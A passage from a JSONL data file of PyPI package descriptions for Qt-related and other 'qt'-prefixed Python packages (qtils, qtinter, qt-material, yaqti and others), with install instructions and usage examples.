file holding an arbitrary component as argument:> pyqmlscene MyComponent.qml"} +{"package": "qtils", "pacakge-description": "OverviewQtils - pronounced as cutieels - is a syntactic sugar library to make sweet Python coding even sweeter.DedicationThis library is dedicated toP\u00e1l Hubai, Surfy, my programming Master who spent countless hours answering\nmy questions, providing code examples, and guiding me towards the right approach when I was learning programming\nas a child.FeaturesConvenient collectionsqdict,qlistandQEnumSelf-formatting object inPrettyObjectTwo-way formatter/parser for file sizes, for example \u20185.4 GB\u2019, inDataSizeWeak reference property decoratorweakpropertyCached property decoratorcachedpropertyClass logger decoratorloggedCommon string transformations inqtils.string_utilsResourcesSources are available onGitHubInstaller is available onPyPIUsage guide and more examples are available in thetutorialsDocumentation isavailable online on ReadTheDocsMigrating fromsutils? See thesutils migration guide here.Contributions are always welcome. 
Please see theDeveloper\u2019s guideon getting started.Getting StartedInstallationInstalling the latest release from PyPI usingpip:$pipinstallqtilsInstalling the latest release from PyPI and saving it torequirements.txtusingpip:$pipinstall-srequirements.txtqtilsInstalling the latest pre-release from GitHub:$pipinstall-ehttps://github.com/ultralightweight/qtils.git#masterExamplesAttribute dictionary>>>fromqtilsimport*>>>d=qdict(hello=\"world\")>>>d.hello'world'>>>d.answer=42>>>d['answer']42See more examples in theqdict tutorial, see the API referencehere.Objects with self-formatting capability>>>classMyObject(PrettyObject):...__pretty_fields__=[...'hello',...'answer',...]...def__init__(self,hello,answer):...self.hello=hello...self.answer=answer>>>obj=MyObject('world',42)>>>print(obj)<__main__.MyObjectobjectat...hello='world',answer=42>See more examples in thePrettyObject tutorial, see the API referencehereCached property>>>classDeepThought(object):...@cachedproperty...defanswer_to_life_the_universe_and_everything(self):...print('Deep Thought is thinking')...# Deep Thought: Spends a period of 7.5 million years...# calculating the answer...return42...>>>deep_thougth=DeepThought()>>>deep_thougth.answer_to_life_the_universe_and_everything# first call, getter is calledDeepThoughtisthinking42>>>deep_thougth.answer_to_life_the_universe_and_everything# second call, getter is not called42>>>deldeep_thougth.answer_to_life_the_universe_and_everything# removing cached value>>>deep_thougth.answer_to_life_the_universe_and_everything# getter is called againDeepThoughtisthinking42See more examples in thecachedproperty tutorial, see the API referencehere.Weak reference property>>>fromqtilsimportweakproperty>>>classFoo(object):...@weakproperty...defbar(self,value):pass>>># The code above is the functional equivalent of writing:>>>importweakref>>>classFoo(object):...@property...defbar(self,value):...returnself._bar()ifself._barisnotNoneelseNone...@bar.setter...defbar(self,value):...ifvalueisnotNone:...value=weakref.ref(value)...self._bar=value>>>See more examples in theweakproperty tutorial, see the API referencehere.Formatting and parsing file sizes>>>print(DataSize(123000))123k>>>DataSize('1.45 megabytes')1450000>>>DataSize('1T').format(unit=\"k\",number_format=\"{:,.0f}{}\")'1,000,000,000 k'See more examples in theformatting module tutorial, see the API referencehere.Dynamic module exports>>>fromqtilsimportqlist>>>__all__=qlist()>>>@__all__.register...classFoo(object):...passSee more examples in theqlist tutorial, see the API referencehere.Adding a class-private logger>>>@logged...classLoggedFoo():...def__init__(self):...self.__logger.info(\"Hello World from Foo!\")...See more examples in thelogging module tutorial, see the API referencehere.ContributingPull requests are always welcome! Please see theDeveloper\u2019s Guideon getting started with qtils development.LicenceThis library is available underGNU Lesser General Public Licence v3."} +{"package": "qTimer", "pacakge-description": "A small command line extendable timer that integrates with various project\nmanagement solutions.Installation and ConfigurationqTimer can be install via the\n[Python Package Index](http://pypi.python.org/pypi/qTimer) or via\nsetup.py. qTimer depends upon\n[SQLAlchemy](http://pypi.python.org/pypi/SQLAlchemy) and\n[Alembic](http://pypi.python.org/pypi/alembic) to run.You should take the time to configure qTimer before running it for the first\ntime. 
Basic configuration is to copy the dist-packages/qtimer/default.ini to\n$HOME/.qtimer and then change the url and token. You can also configure things\nsuch as how long will qTimer cache data from remote sources and how much will\nit round time in both display and posting. The[alembic]and[loggers]sections are for advanced users only, and the average user should probably\nsteer clear of those.Extending qTimerIf you\u2019re interested in extending qTimer take a look at the plugins folder\nand the commands folder.A command is a class which provides a sub-parser and business logic\nfor a given sub-command. See commands folder and command.py for detailsA plugin represents a way of retrieving data from a remote source. Plugins\nare required to have the magic method load_qtimer_plugin(url, token). See\nplugins/plugin.prototype.py for more details."} +{"package": "qtimgren", "pacakge-description": "qtimgrenDescriptionThis is a GUI around thepyimgrenpackage. Currently it is able to rename camera images\nvia pyimgren forth and back. Its main feature is that it allows a manual\nselection of the images to rename.Of course buttons are there to allow default selections.It is based onprofiles. Forqtimgren, a profile is what is required for\npyimgren configuration:a foldera source pattern to identify camera images (typically IMG*.JPG or DSCF*.JPG)a compatible withdatatime.strftimepattern to build the new name from\nthe JPEG timestampand of course a unique nameThanks to pyimgren, it is possible to use a delta in minutes to cope with\na digital camera having a wrong time.In order to make image selection easier, thumbnails can be displayed in the\nmain application window along with the current, future and original names. But\nas image computation and display are expensive tasks, the display can be\nturned off. Anyway, the computation is asynchronous, meaning that the\napplication can be used as soon as the currently displayed images are\navailable.InstallationDirect installation on WindowsThanks to PyInstaller and InnoSetup, an installer and a portable zip file\nare available onGithub.That way you have no dependencies, not even on Python.From PyPIpip install qtimgrenFrom GithubThis is the recommended way if you want to contribute or simply tweakqtimgrento your own requirements. You can get a local copy by\ndownloading a zipfile but if you want to make changes, you should\nrather clone the repository to have access to allgitgoodies:git clone https://github.com/s-ball/qtimgren.gitYou can then install it in your main Python installation or in a venv with:pip install -e .or on Windows with the launcher:py -m pip install -e .Alternatively, you can use thesetup.pyscript to build the unversioned\nfiles without installing anything:python setup.py buildSpecial handling ofversion.py:QtImgrenrelies onsetuptools-scmto automatically extract a\nversion number from git metadata and store it in aversion.pyfile\nfor later use. The requires the availability of bothgit(which should\nnot be a problem when the project is downloaded from Github), andsetuptools-scm. 
If it fails because one is not available or because\ngit metadata is not there (if you only downloaded a zip archive from\nGithub), the version is set to 0.0.0For that reason, if you do not use git to download the sources, you\nshould download a source distribution from PyPI, because the latter\ncontains a validversion.pypipuses thepyproject.tomlfile with respect to PEP-518 and\nPEP-517 to know thatsetuptools-scmis required before the build.Basic useOnce installed, you can run the application:qtimgrenInternationalizationThe application is natively written is English, and contains a French\ntranslation of its IHM. It depends on Qt Linguist tools for generating the\nbinary file used at run-time. The required toollreleaseexists in the\nWindows PySide2 distribution, but not in Linux or Mac ones. On those\nplatforms, you need a to install the Qt development tools and ensure that\nthey are accessible via the path.Of course, if you install from a PyPi wheel, the compiled message files are\nincluded as a resource.At run time, the system default language is used by default, or can be\nexplicitly specified with the--langoption:qtimgren --lang=fr # forces fr language\nqtimgren --lang=C # forces native english languageContributionsContributions are welcome, including translations or just issues on GitHub.\nProblems are expected to be documented so that they can be reproduced. But\nI only develop this on my free time, so I cannot guarantee quick answers...Disclaimer: beta qualityAll functionalities are now implemented, and the underlying pyimgren module\nhas been used for years. I trust it enough to handle my own photographies\nwith it. Yet it still lacks a decent documentation, and\nhas not been extensively testedLicenseThis work is licenced under a MIT Licence. SeeLICENSE.txt"} +{"package": "qtim_tools", "pacakge-description": "UNKNOWN"} +{"package": "qt-installer", "pacakge-description": "yaqti (Yet Another QT Installer - ya-q-ti!)Overviewyaqtiis a basic unofficial CLI Qt installer; designed to keep things as stupid as possible. It lets you install different Qt5 and Qt6 versions with optional modules such as QtCharts, QtNetworkAuth ect all in a single command,# install yaqtipipinstallyaqti# install Qt!python-myaqtiinstall--oswindows--platformdesktop--version6.2.0--modulesqtchartsqtquick3d, optionally the--set-envcan be specified. This setsQt5_DIR/Qt6_DIRso CMake can find the installation.--install-depscan be specified, on Linux platforms to install Qt dependencies fromapt-get.\nIt can also be used as a github action,- name: Install Qt\n uses: WillBrennan/yaqti\n with:\n version: '6.2.0'\n host: 'linux'\n target: 'desktop'\n modules: 'qtcharts qtwebengine'. By default, the github-action will set the enviroment variables for Qt and install Qt dependencies. For a real-world example visitdisk_usage, the project this was made for.OptionsversionThe version of Qt to install, for example6.2.0or5.15.2. It checks the version is valid.osThe operating system you'll be running onlinux,windows, ormac.platformThe platform you'll be building for,desktop,winrt,android, orios.modulesThe optional Qt modules to install such as,qtcharts,qtpurchasing,qtwebengine,qtnetworkauth,qtscript,debug_info.output-default: ./qtThe directory to install Qt in, it will put it in aversionsub directory. 
By default if you install--version=5.15.2it will install qt into./qt/5152.--set-envsDesigned for use in CI pipelines; this sets enviromental variables such asPATH,Qt5_DIR, andQt6_DIRso CMake can find Qt and you can use executables directly.--install-depsDesigned for use in CI pipelines. This installs dependencies required by Qt on Linux platforms. If this flag is provided on non-linux platforms it does nothing.Why Another Qt CLI Installer?I've had issues with other CLI installers in the past,They'll silently fail to download a module if you typeqchartsinstead ofqtchartsThis fetches module and addon configurations directly from the Qt Archive, new modules and versions will appear without the tool updating!It keeps module names the same between Qt5 and Qt6 despite Qt moving them around a bit.I like to keep things stupidly simple!How does it work?!Qt provides theQt Archive, this script simply works out what 7zip files to fetch and unpacks them to the specified installation directory. Then if you want, it sets the enviroment variable so CMake can find the install."} +{"package": "qtinter", "pacakge-description": "qtinter \u2014 Interop between asyncio and Qt for Pythonqtinteris a Python module that brings together asyncio and Qt\nfor Python, allowing you to use one from the other seamlessly.Read thefull documentationor check out the quickstart below.Installation$ pip install qtinterUsing asyncio from QtTo use asyncio-based libraries in Qt for Python, encloseapp.exec()inside context managerqtinter.using_asyncio_from_qt().Example (taken fromexamples/clock.py):\"\"\"Display LCD-style digital clock\"\"\"importasyncioimportdatetimeimportqtinter# <-- import modulefromPySide6importQtWidgetsclassClock(QtWidgets.QLCDNumber):def__init__(self,parent=None):super().__init__(parent)self.setDigitCount(8)defshowEvent(self,event):self._task=asyncio.create_task(self._tick())defhideEvent(self,event):self._task.cancel()asyncdef_tick(self):whileTrue:t=datetime.datetime.now()self.display(t.strftime(\"%H:%M:%S\"))awaitasyncio.sleep(1.0-t.microsecond/1000000+0.05)if__name__==\"__main__\":app=QtWidgets.QApplication([])widget=Clock()widget.setWindowTitle(\"qtinter - Digital Clock example\")widget.resize(300,50)withqtinter.using_asyncio_from_qt():# <-- enable asyncio in qt codewidget.show()app.exec()Using Qt from asyncioTo use Qt components from asyncio-based code, enclose the asyncio\nentry-point inside context managerqtinter.using_qt_from_asyncio().Example (taken fromexamples/color.py):\"\"\"Display the RGB code of a color chosen by the user\"\"\"importasyncioimportqtinter# <-- import modulefromPySide6importQtWidgetsasyncdefchoose_color():dialog=QtWidgets.QColorDialog()dialog.show()future=asyncio.Future()dialog.finished.connect(future.set_result)result=awaitfutureifresult==QtWidgets.QDialog.DialogCode.Accepted:returndialog.selectedColor().name()else:returnNoneif__name__==\"__main__\":app=QtWidgets.QApplication([])withqtinter.using_qt_from_asyncio():# <-- enable qt in asyncio codecolor=asyncio.run(choose_color())ifcolorisnotNone:print(color)Using modal dialogsTo execute a modal dialog without blocking the asyncio event loop,\nwrap the dialog entry-point inqtinter.modal()andawaiton it.Example (taken fromexamples/hit_100.py):importasyncioimportqtinterfromPySide6importQtWidgetsasyncdefmain():asyncdefcounter():nonlocalnwhileTrue:print(f\"\\r{n}\",end='',flush=True)awaitasyncio.sleep(0.025)n+=1n=0counter_task=asyncio.create_task(counter())awaitqtinter.modal(QtWidgets.QMessageBox.information)(None,\"Hit 100\",\"Click OK when 
you think you hit 100.\")counter_task.cancel()ifn==100:print(\"\\nYou did it!\")else:print(\"\\nTry again!\")if__name__==\"__main__\":app=QtWidgets.QApplication([])withqtinter.using_qt_from_asyncio():asyncio.run(main())Requirementsqtintersupports the following:Python version: 3.7 or higherQt binding: PyQt5, PyQt6, PySide2, PySide6Operating system: Linux, MacOS, WindowsLicenseBSD License.ContributingPlease raise an issue if you have any questions. Pull requests are more\nthan welcome!Creditsqtinteris derived fromqasyncbut rewritten from\nscratch. qasync is derived fromasyncqt, which is derived fromquamash."} +{"package": "qtinteract", "pacakge-description": "qtinteractA library for building fast interactive plots in Jupyter notebooks using Qt Widgets.Installationpip install qtinteractUsage%gui qt5 \n\nfrom math import pi\nfrom qtinteract import iplot\n\ndef f(x, a):\n return np.sin(a*x)\n\nx = np.linspace(0, 2*pi, 101)\n\niplot(x, f, a=(1., 5.))"} +{"package": "qtip", "pacakge-description": "QTIP provides Benchmarking as a Service for OPNFV community[![License](https://img.shields.io/github/license/opnfv/qtip.svg)](https://git.opnfv.org/qtip/tree/LICENSE)\n[![Jenkins](https://img.shields.io/jenkins/s/https/build.opnfv.org/ci/view/qtip/job/qtip-verify-master.svg)](https://build.opnfv.org/ci/view/qtip/job/qtip-verify-master/)\n[![Jenkins coverage](https://img.shields.io/jenkins/c/https/build.opnfv.org/ci/view/qtip/job/qtip-verify-master.svg)](https://build.opnfv.org/ci/view/qtip/job/qtip-verify-master/cobertura)\n[![PyPI](https://img.shields.io/pypi/v/qtip.svg)](https://pypi.python.org/pypi/qtip)\n[![Docker Pulls](https://img.shields.io/docker/pulls/opnfv/qtip.svg)](https://hub.docker.com/r/opnfv/qtip/)See [project wiki](https://wiki.opnfv.org/display/qtip) for more information."} +{"package": "qtip-api", "pacakge-description": "Failed to fetch description. HTTP Status Code: 404"} +{"package": "qtip-cli", "pacakge-description": "Failed to fetch description. HTTP Status Code: 404"} +{"package": "qtip-client-cli", "pacakge-description": "No description available on PyPI."} +{"package": "qtjMath", "pacakge-description": "No description available on PyPI."} +{"package": "qtjq", "pacakge-description": "No description available on PyPI."} +{"package": "qt-jsonschema-form", "pacakge-description": "qt-jsonschema-formA tool to generate Qt forms from JSON Schemas.FeaturesError messages from JSONSchema validation (see jsonschema).Widgets for file selection, colour picking, date-time selection (and more).Per-field widget customisation is provided by an additional ui-schema (inspired byhttps://github.com/mozilla-services/react-jsonschema-form).Unsupported validatorsCurrently this tool does not supportanyOforoneOfdirectives. The reason for this is simply that these validators have different semantics depending upon the context in which they are found. Primitive support could be added with meta-widgets for type schemas.Additionally, the$refkeyword is not supported. 
This will be fixed, but is waiting on some proposed upstream changes injsonschemaExampleimportsysfromjsonimportdumpsfromqtpyimportQtWidgetsfromqt_jsonschema_formimportWidgetBuilderif__name__==\"__main__\":app=QtWidgets.QApplication(sys.argv)builder=WidgetBuilder()schema={\"type\":\"object\",\"title\":\"Number fields and widgets\",\"properties\":{\"schema_path\":{\"title\":\"Schema path\",\"type\":\"string\"},\"integerRangeSteps\":{\"title\":\"Integer range (by 10)\",\"type\":\"integer\",\"minimum\":55,\"maximum\":100,\"multipleOf\":10},\"event\":{\"type\":\"string\",\"format\":\"date\"},\"sky_colour\":{\"type\":\"string\"},\"names\":{\"type\":\"array\",\"items\":[{\"type\":\"string\",\"pattern\":\"[a-zA-Z\\-'\\s]+\",\"enum\":[\"Jack\",\"Jill\"]},{\"type\":\"string\",\"pattern\":\"[a-zA-Z\\-'\\s]+\",\"enum\":[\"Alice\",\"Bob\"]},],\"additionalItems\":{\"type\":\"number\"},}}}ui_schema={\"schema_path\":{\"ui:widget\":\"filepath\"},\"sky_colour\":{\"ui:widget\":\"colour\"}}form=builder.create_form(schema,ui_schema)form.widget.state={\"schema_path\":\"some_file.py\",\"integerRangeSteps\":60,\"sky_colour\":\"#8f5902\",\"names\":[\"Jack\",\"Bob\"]}form.show()form.widget.on_changed.connect(lambdad:print(dumps(d,indent=4)))app.exec_()NotesThis package usesQtPyas an abstraction layer for PyQt5/PySide2/PyQt6/PySide6. One of those libraries must also be installed in order to function."} +{"package": "qt-json-setting", "pacakge-description": "pyqt\u8bbe\u7f6e\u751f\u6210\u5668\u4e00\u4e2a\u53ef\u4ee5\u6839\u636ejson schema\u81ea\u52a8\u751f\u6210\u8bbe\u7f6e\u754c\u9762\u7684\u5de5\u5177\u529f\u80fd:\u9519\u8bef\u63d0\u793a\u9009\u9879\u63cf\u8ff0\u9ed8\u8ba4\u503c\u63d0\u793a\u62d3\u5c55\u8bed\u6cd5item_list:\n\u4f60\u53ef\u4ee5\u901a\u8fc7\u6307\u5b9aitem_list\u6765\u9650\u5b9a\u5185\u5bb9\n\u4f8b\u5982:\"optional\":{\"type\":\"string\",\"title\":\"test2\",\"item_list\":[\"bule\",\"green\",\"yellow\"]}\u6548\u679c:"} +{"package": "qtk", "pacakge-description": "# Quant Python ToolKitThis package is intended to be a layer above QuantLib Python and a few other quantitative librariesto be more accessible for quantitative finance calculations.## Minimal ExampleHere is a minimal example for valuing a bond using a provided zero rates.from qtk import Controller, Field as F, Template as Tdata = [{'Compounding': 'Compounded','CompoundingFrequency': 'Annual','Currency': 'USD','DiscountBasis': '30/360','DiscountCalendar': 'UnitedStates','ListOfDate': ['1/15/2015', '7/15/2015', '1/15/2016'],'ListOfZeroRate': [0.0, 0.005, 0.007],'ObjectId': 'USD.Zero.Curve','Template': 'TermStructure.Yield.ZeroCurve'},{'DiscountCurve': '->USD.Zero.Curve','ObjectId': 'BondEngine','Template': 'Engine.Bond.Discounting'},{'AccrualCalendar': 'UnitedStates','AccrualDayConvention': 'Unadjusted','AsOfDate': '2016-01-15','Coupon': 0.06,'CouponFrequency': 'Semiannual','Currency': 'USD','DateGeneration': 'Backward','EndOfMonth': False,'IssueDate': '2015-01-15','MaturityDate': '2016-01-15','ObjectId': 'USD.TBond','PaymentBasis': '30/360','PricingEngine': '->BondEngine','Template': 'Instrument.Bond.TreasuryBond'}]res = Controller(data)asof_date = \"1/15/2015\"ret = res.process(asof_date)tbond = res.object(\"USD.TBond\")print tbond.NPV()The basic idea here is that once you have the data prepared, the `Controller` can be invoked to do the calculations.A few points that are worth noting here.- All the data is textual and rather intuitive. For instance, the couponfrequency is just stated as `Annual` or `Semiannual`. 
The same is true for a lot of other fields. For dates, the `dateutil` package is used to parse and covers a wide variety of formats. - The `data` is essentially a `list` of `dict` with each `dict` corresponding to a specific `object` as determined by the value of the key `Template` in each `dict`. Each `object` here has a name as specified by the value of the key `ObjectId`. - One of the values can refer to another object described by a `dict` by using the `reference` syntax. For instance, the first `dict` in the `data` list (with `ObjectId` given as *USD.Zero.Curve*) refers to an interest rate term structure of zero rates. The next object is a discounting bond engine, and requires a yield curve as input for the discount curve. Here the yield curve is referred to by using the prefix `->` along with the name of the object we are referring to. - Here, the `Controller` parses the data, figures out the dependencies, and processes the objects in the correct order, fulfilling the dependencies behind the scenes. ## Introspection There are a few convenience methods that provide help on how to construct the data packet. For example, the `help` method in the template prints out the summary and list of fields on how to construct the data packet for the template. > T.TS_YIELD_BOND.help() **Description** A template for creating a yield curve by stripping bond quotes. **Required Fields** - `Template` [*Template*]: 'TermStructure.Yield.BondCurve' - `InstrumentCollection` [*List*]: Collection of instruments - `AsOfDate` [*Date*]: Reference date or as-of date - `Country` [*String*]: Country - `Currency` [*String*]: Currency **Optional Fields** - `ObjectId` [*String*]: A unique name or identifier to refer to this dictionary data - `InterpolationMethod` [*String*]: The interpolation method can be one of the following choices: LinearZero, CubicZero, FlatForward, LinearForward, LogCubicDiscount. - `DiscountBasis` [*DayCount*]: Discount Basis - `SettlementDays` [*Integer*]: Settlement days - `DiscountCalendar` [*Calendar*]: Discount Calendar The `help` method prints the description from the `info` method in Markdown format. When using IPython/Jupyter notebooks, the description prints in a nice-looking format. One can start with a sample data packet to fill out the input fields using the `sample_data` method. > T.TS_YIELD_BOND.sample_data() {'AsOfDate': 'Required (Date)', 'Country': 'Required (String)', 'Currency': 'Required (String)', 'DiscountBasis': 'Optional (DayCount)', 'DiscountCalendar': 'Optional (Calendar)', 'InstrumentCollection': 'Required (List)', 'InterpolationMethod': 'Optional (String)', 'ObjectId': 'Optional (String)', 'SettlementDays': 'Optional (Integer)', 'Template': 'TermStructure.Yield.BondCurve'} ## Installation You can install qtk using `pip` or `easy_install`: pip install qtk or easy_install qtk. `qtk` has a dependency on `QuantLib-Python` which needs to be installed as well."} +{"package": "qtkanobu", "pacakge-description": "qtkanobu Qt port of kanobu"} +{"package": "qtkitty", "pacakge-description": "Failed to fetch description. 
HTTP Status Code: 404"} +{"package": "qtl", "pacakge-description": "pyQTL pyQTL is a python module for analyzing and visualizing quantitative trait loci (QTL) data. Install You can install pyQTL using pip: pip3 install qtl, or directly from this repository: $ git clone git@github.com:broadinstitute/pyqtl.git $ cd pyqtl # set up virtual environment and install $ virtualenv venv $ source venv/bin/activate (venv)$ pip install -e ."} +{"package": "qtlab", "pacakge-description": "No description available on PyPI."} +{"package": "qtl-ctp-api", "pacakge-description": "qtl-ctp-api Only for Linux. prepare: sudo locale-gen zh_CN.GBK install: pip install qtl-ctp-api version CTP: v6.7.2"} +{"package": "qt-ledwidget", "pacakge-description": "No description available on PyPI."} +{"package": "qtlib", "pacakge-description": "qtlib, an open source quantitative trading library"} +{"package": "qtl-instrument-book", "pacakge-description": "Quantalon Instrument Book"} +{"package": "qtl-kit", "pacakge-description": "Failed to fetch description. HTTP Status Code: 404"} +{"package": "qtl-metrics", "pacakge-description": "Quantalon Metrics QuickStart import yfinance as yf from qtl_metrics import Metrics aapl = yf.Ticker(\"AAPL\") data = aapl.history() prices = data['Close'] metrics = Metrics(prices) print(metrics.stats)"} +{"package": "qtl-models", "pacakge-description": "No description available on PyPI."} +{"package": "qt-log", "pacakge-description": "QtLog Custom Python Log with colored message display for Maya/Houdini/Nuke. PySide2/Python3 - Maya +2022, Houdini +19, Nuke +13. Message Levels log = get_stream_logger('my_log') log.info('test info') # white log.warning('test warning') # orange log.error('test error') # red log.critical('test critical') # purple log.debug('test debug') # yellow log.ok('test ok') # sky blue log.file('test file') # super light blue log.process('test process') # light blue log.done('test done') # green log.hint('hint to the user') # yellow Usage # imports from qtlog.stream_log import get_stream_logger from qtlog.qt_ui_logger import QtUILogger # get loggers log = get_stream_logger('MyToolLog') log_ext = get_stream_logger('ExternalLog') # create the log widget self.loggers = QtUILogger(parent=self, layout_widget=self.ui.log_layout, loggers=[log, log_ext]) # sent messages are displayed in color on the ui widget and maya log.hint('Message')"} +{"package": "qtlsearch", "pacakge-description": "No description available on PyPI."} +{"package": "qtl-trading-calendar", "pacakge-description": "Quantalon Trading Calendar A trading-day calendar for the domestic (China) markets. Quick Start Install: $ pip install qtl-trading-calendar Expiration Date 2024-12-31 Tests python -m unittest .\\tests\\test.py or python -m unittest discover -s tests"} +{"package": "qtl-xtp-api", "pacakge-description": "qtl-xtp-api Only for Linux install: pip install qtl-xtp-api version XTP: 2.2.35.1"} +{"package": "qtm", "pacakge-description": "Future versions of this package will go under the name “qtm-rt”."} +{"package": "qtmacs", "pacakge-description": "Qtmacs is an Emacs inspired macro framework for Qt. It consists of task related applets and widget specific macros. Applets are basically plain windows that can house arbitrary code and widgets. Within Qtmacs, they provide the functionality to e.g. edit text, view a PDF file, or browse the web. Macros, on the other hand, govern the behaviour of individual widgets in response to keyboard input. 
They are are applicable to any Qt based\nwidget.Both, applets and macros, are supplied via Python modules and can be\nchanged during runtime to customise the functionality and behaviour of\nQtmacs as required.SOURCE CODEThe source code is hosted on Github:https://github.com/qtmacsdev/qtmacsREQUIREMENTSPython 3.xPyQt4Older versions of PyQt4 may work as well but have not been tested.INSTALLATIONTo install Qtmacs on Windows, or use package managers on Linux based\ndistributions, please refer to theinstallation guide.To try out the source code directly use:gitclonehttps://github.com/qtmacsdev/qtmacs.gitcdqtmacs/bin./qtmacsDOCUMENTATIONThe full documentation, including screenshots, is available athttp://qtmacsdev.github.com/qtmacs/titlepage.htmlThere is also a discussion group athttps://groups.google.com/forum/?fromgroups#!forum/qtmacsLICENSEQtmacs is licensed under the terms of the GPL."} +{"package": "qt-material", "pacakge-description": "Qt-MaterialThis is another stylesheet forPySide6,PySide2,PyQt5andPyQt6, which looks like Material Design (close enough).There is some custom dark themes:And light:NavigationInstallUsageThemesCustom colorsUsageLight themesEnviron variablesAlternative QPushButtons and custom fontsCustom stylesheetsRun examplesNew themesChange theme in runtimeExport themeDensity scaleTroubleshootsInstallpipinstallqt-materialUsageimportsysfromPySide6importQtWidgets# from PySide2 import QtWidgets# from PyQt5 import QtWidgetsfromqt_materialimportapply_stylesheet# create the application and the main windowapp=QtWidgets.QApplication(sys.argv)window=QtWidgets.QMainWindow()# setup stylesheetapply_stylesheet(app,theme='dark_teal.xml')# runwindow.show()app.exec_()Themesfromqt_materialimportlist_themeslist_themes()WARNING:root:qt_material must be imported after PySide or PyQt!\n\n\n\n\n\n['dark_amber.xml',\n 'dark_blue.xml',\n 'dark_cyan.xml',\n 'dark_lightgreen.xml',\n 'dark_pink.xml',\n 'dark_purple.xml',\n 'dark_red.xml',\n 'dark_teal.xml',\n 'dark_yellow.xml',\n 'light_amber.xml',\n 'light_blue.xml',\n 'light_cyan.xml',\n 'light_cyan_500.xml',\n 'light_lightgreen.xml',\n 'light_pink.xml',\n 'light_purple.xml',\n 'light_red.xml',\n 'light_teal.xml',\n 'light_yellow.xml']Custom colorsColor Toolis the best way to generate new themes, just choose colors and export asAndroid XML, the theme file must look like:#00e5ff#6effff#f5f5f5#ffffff#e6e6e6#000000#000000Save it asmy_theme.xmlor similar and apply the style sheet from Python.apply_stylesheet(app,theme='dark_teal.xml')Light themesLight themes will need to addinvert_secondaryargument asTrue.apply_stylesheet(app,theme='light_red.xml',invert_secondary=True)Environ variablesThere is a environ variables related to the current theme used, these variables are forconsult purpose only.Environ variableDescriptionExampleQTMATERIAL_PRIMARYCOLORPrimary color#2979ffQTMATERIAL_PRIMARYLIGHTCOLORA bright version of the primary color#75a7ffQTMATERIAL_SECONDARYCOLORSecondary color#f5f5f5QTMATERIAL_SECONDARYLIGHTCOLORA bright version of the secondary color#ffffffQTMATERIAL_SECONDARYDARKCOLORA dark version of the primary color#e6e6e6QTMATERIAL_PRIMARYTEXTCOLORColor for text over primary background#000000QTMATERIAL_SECONDARYTEXTCOLORColor for text over secondary background#000000QTMATERIAL_THEMEName of theme usedlight_blue.xmlAlternative QPushButtons and custom fontsThere is anextraargument for accent colors and custom fonts.extra={# Button colors'danger':'#dc3545','warning':'#ffc107','success':'#17a2b8',# 
Font'font_family':'Roboto',}apply_stylesheet(app,'light_cyan.xml',invert_secondary=True,extra=extra)The accent colors are applied toQPushButtonwith the correspondingclassproperty:pushButton_danger.setProperty('class','danger')pushButton_warning.setProperty('class','warning')pushButton_success.setProperty('class','success')Custom stylesheetsCustom changes can be performed by overwriting the stylesheets, for example:QPushButton{{color:{QTMATERIAL_SECONDARYCOLOR};text-transform:none;background-color:{QTMATERIAL_PRIMARYCOLOR};}}.big_button{{height:64px;}}Then, the current stylesheet can be extended just with:apply_stylesheet(app,theme='light_blue.xml',css_file='custom.css')The stylesheet can also be changed on runtime by:stylesheet=app.styleSheet()withopen('custom.css')asfile:app.setStyleSheet(stylesheet+file.read().format(**os.environ))And the class style can be applied with thesetPropertymethod:self.main.pushButton.setProperty('class','big_button')Run examplesA window with almost all widgets (see the previous screenshots) are available to test all themes andcreate new ones.gitclonehttps://github.com/UN-GCPDS/qt-material.gitcdqt-materialpythonsetup.pyinstallcdexamples/full_featurespythonmain.py--pyside6New themesDo you have a custom theme? it looks good? create apull requestinthemes folderand share it with all users.Change theme in runtimeThere is aqt_material.QtStyleToolsclass that must be inherited along toQMainWindowfor change themes in runtime using theapply_stylesheet()method.classRuntimeStylesheets(QMainWindow,QtStyleTools):def__init__(self):super().__init__()self.main=QUiLoader().load('main_window.ui',self)self.apply_stylesheet(self.main,'dark_teal.xml')# self.apply_stylesheet(self.main, 'light_red.xml')# self.apply_stylesheet(self.main, 'light_blue.xml')Integrate stylesheets in a menuA customstylesheets menucan be added to a project for switching across all default available themes.classRuntimeStylesheets(QMainWindow,QtStyleTools):def__init__(self):super().__init__()self.main=QUiLoader().load('main_window.ui',self)self.add_menu_theme(self.main,self.main.menuStyles)Create new themesA simple interface is available to modify a theme in runtime, this feature can be used to create a new theme, the theme file is created in the main directory asmy_theme.xmlclassRuntimeStylesheets(QMainWindow,QtStyleTools):def__init__(self):super().__init__()self.main=QUiLoader().load('main_window.ui',self)self.show_dock_theme(self.main)A full set of examples are available in theexmaples directoryExport themeThis feature able to useqt-materialthemes intoQtimplementations using only local files.fromqt_materialimportexport_themeextra={# Button colors'danger':'#dc3545','warning':'#ffc107','success':'#17a2b8',# Font'font_family':'monoespace','font_size':'13px','line_height':'13px',# Density Scale'density_scale':'0',# environ'pyside6':True,'linux':True,}export_theme(theme='dark_teal.xml',qss='dark_teal.qss',rcc='resources.rcc',output='theme',prefix='icon:/',invert_secondary=False,extra=extra,)This script will generate bothdark_teal.qssandresources.rccand a folder with all theme icons calledtheme.The files generated can be integrated into aPySide6application just with:importsysfromPySide6importQtWidgetsfromPySide6.QtCoreimportQDirfrom__feature__importsnake_case,true_property# Create applicationapp=QtWidgets.QApplication(sys.argv)# Load styleswithopen('dark_teal.qss','r')asfile:app.style_sheet=file.read()# Load iconsQDir.add_search_path('icon','theme')# 
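# 'icon' is registered here as a Qt search-path prefix, so icon references of
# the form icon:... inside the exported dark_teal.qss resolve against the
# ./theme folder generated by export_theme (matching prefix='icon:/' above).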
Appwindow=QtWidgets.QMainWindow()checkbox=QtWidgets.QCheckBox(window)checkbox.text='CheckBox'window.show()app.exec()This files can also be used into nonPythonenvirons likeC++.Density scaleTheextraarguments also include an option to set thedensity scale, by default is0.extra={# Density Scale'density_scale':'-2',}apply_stylesheet(app,'default',invert_secondary=False,extra=extra)TroubleshootsQMenuQMenuhas multiple rendering for each Qt backend, and for each operating system. Even can be related with the style, likefusion. Then, theextraargument also supportsQMenuparameters to configure this widgest for specific combinations. This options are not affected bydensity scale.extra['QMenu']={'height':50,'padding':'50px 50px 50px 50px',# top, right, bottom, left}"} +{"package": "qt-material-stubs", "pacakge-description": "qt_material-stubsInstallationpip install qt_material-stubsStyle GuidelinesFollow the same style guidelines astypeshed."} +{"package": "qtme", "pacakge-description": "Copyright (c) 2023 J\u00e9r\u00e9mie DECOCK (www.jdhp.org)Web site:http://www.jdhp.org/software_en.html#qtmeOnline 